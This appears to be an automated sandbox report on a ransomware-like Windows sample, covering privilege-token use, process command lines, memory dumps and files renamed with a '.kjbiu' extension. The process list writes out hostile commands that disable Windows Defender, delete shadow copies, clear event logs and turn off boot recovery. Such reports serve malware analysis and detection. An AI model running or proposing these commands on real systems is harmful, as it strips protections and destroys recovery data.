| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe
"C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1298d" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1298d" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1298d" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/1620-115-0x0000000000000000-mapping.dmp
memory/1860-116-0x0000000000000000-mapping.dmp
memory/952-117-0x0000000000000000-mapping.dmp
memory/2972-118-0x0000000000000000-mapping.dmp
memory/1052-119-0x0000000000000000-mapping.dmp
memory/3980-120-0x0000000000000000-mapping.dmp
memory/3504-121-0x0000000000000000-mapping.dmp
memory/2012-122-0x0000000000000000-mapping.dmp
memory/3248-123-0x0000000000000000-mapping.dmp
memory/1668-124-0x0000000000000000-mapping.dmp
memory/1236-125-0x0000000000000000-mapping.dmp
memory/2964-126-0x0000000000000000-mapping.dmp
memory/3104-127-0x0000000000000000-mapping.dmp
memory/680-128-0x0000000000000000-mapping.dmp
memory/404-129-0x0000000000000000-mapping.dmp
memory/2748-130-0x0000000000000000-mapping.dmp
memory/612-131-0x0000000000000000-mapping.dmp
memory/1648-132-0x0000000000000000-mapping.dmp
memory/912-133-0x0000000000000000-mapping.dmp
memory/1284-134-0x0000000000000000-mapping.dmp
memory/1400-135-0x0000000000000000-mapping.dmp
memory/2304-136-0x0000000000000000-mapping.dmp
memory/2096-137-0x0000000000000000-mapping.dmp
memory/2924-138-0x0000000000000000-mapping.dmp
memory/2068-139-0x0000000000000000-mapping.dmp
memory/2892-140-0x0000000000000000-mapping.dmp
memory/2968-141-0x0000000000000000-mapping.dmp
memory/3352-142-0x0000000000000000-mapping.dmp
memory/3040-143-0x0000000000000000-mapping.dmp
memory/3312-144-0x0000000000000000-mapping.dmp
memory/596-145-0x0000000000000000-mapping.dmp
memory/1364-146-0x0000000000000000-mapping.dmp
memory/2220-147-0x0000000000000000-mapping.dmp
memory/2560-148-0x0000000000000000-mapping.dmp
memory/1212-149-0x0000000000000000-mapping.dmp
memory/64-150-0x0000000000000000-mapping.dmp
memory/2116-151-0x0000000000000000-mapping.dmp
memory/1936-152-0x0000000000000000-mapping.dmp
memory/1076-153-0x0000000000000000-mapping.dmp
memory/3292-154-0x0000000000000000-mapping.dmp
memory/1676-155-0x0000000000000000-mapping.dmp
memory/3236-156-0x0000000000000000-mapping.dmp
memory/2756-157-0x0000000000000000-mapping.dmp
memory/2772-158-0x0000000000000000-mapping.dmp
memory/2736-159-0x0000000000000000-mapping.dmp
memory/724-160-0x0000000000000000-mapping.dmp
memory/1648-161-0x0000000000000000-mapping.dmp
memory/2424-162-0x0000000000000000-mapping.dmp
memory/1652-163-0x0000000000000000-mapping.dmp
memory/1680-164-0x0000000000000000-mapping.dmp
memory/2060-165-0x0000000000000000-mapping.dmp
memory/1956-166-0x0000000000000000-mapping.dmp
memory/3608-167-0x0000000000000000-mapping.dmp
memory/3076-168-0x0000000000000000-mapping.dmp
memory/3964-169-0x0000000000000000-mapping.dmp
memory/3724-170-0x0000000000000000-mapping.dmp
memory/2020-171-0x0000000000000000-mapping.dmp
memory/3068-172-0x0000000000000000-mapping.dmp
memory/2200-173-0x0000000000000000-mapping.dmp
memory/1772-174-0x0000000000000000-mapping.dmp
memory/1456-175-0x0000000000000000-mapping.dmp
memory/1556-176-0x0000000000000000-mapping.dmp
memory/2232-177-0x0000000000000000-mapping.dmp
memory/520-178-0x0000000000000000-mapping.dmp
memory/1724-179-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-180-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-181-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-182-0x000001F1B5070000-0x000001F1B5072000-memory.dmp
memory/1724-183-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-184-0x000001F1B5073000-0x000001F1B5075000-memory.dmp
memory/1724-185-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-186-0x000001F1CF4E0000-0x000001F1CF502000-memory.dmp
memory/1724-187-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-188-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-189-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-190-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-191-0x000001F1CF690000-0x000001F1CF706000-memory.dmp
memory/1724-192-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-198-0x000001F1B5076000-0x000001F1B5078000-memory.dmp
memory/1724-217-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1724-218-0x000001F1B3440000-0x000001F1B3442000-memory.dmp
memory/1856-220-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/1856-221-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-222-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-223-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-224-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-225-0x000001625A310000-0x000001625A332000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab5384538340dbefc8b390d5e5d52b07 |
| SHA1 | f02e42f631ec9e30ed94f2d23968d2f4fece6247 |
| SHA256 | ba2ce1e335fad9db3af5d55fede4d91545a86f97ef919734a224bbd6755b7d39 |
| SHA512 | 992eeac7aaef7d7fdf38d2dcf194b48299dfdea046056a3d25ce47a2f8939b2dc8499946898e38c4734d301c84f000af6958c449d68e975f00671513eb085b29 |
memory/1856-227-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-228-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-229-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-230-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-231-0x000001625A4C0000-0x000001625A536000-memory.dmp
memory/1724-232-0x000001F1B5078000-0x000001F1B5079000-memory.dmp
memory/1856-233-0x0000016258330000-0x0000016258332000-memory.dmp
memory/1856-234-0x0000016258333000-0x0000016258335000-memory.dmp
memory/1856-235-0x000001623FBF0000-0x000001623FBF2000-memory.dmp
memory/1856-261-0x0000016258336000-0x0000016258338000-memory.dmp
memory/1856-262-0x0000016258338000-0x0000016258339000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 10:46
Reported
2022-01-13 10:52
Platform
win7-en-20211208
Max time kernel
294s
Max time network
124s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_kmZpC6EdK1s0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Bsuf4OquaXU0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_waT36ZdzkPA0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_pZ-3-lg5ieE0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXC.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_g0BTV98jWhY0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Msgbox.accdt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_T2C6cSbQ_9Q0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_r0Y-kCb6fsQ0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_OXrr-t1e-Zs0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT__g-MfHMU0XI0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_akQw9TAJFow0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_KTe2NZKrtKI0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.ELM.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_jd3SE2KOzWw0.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_7u35XtJ27L00.kjbiu | C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe | N/A |
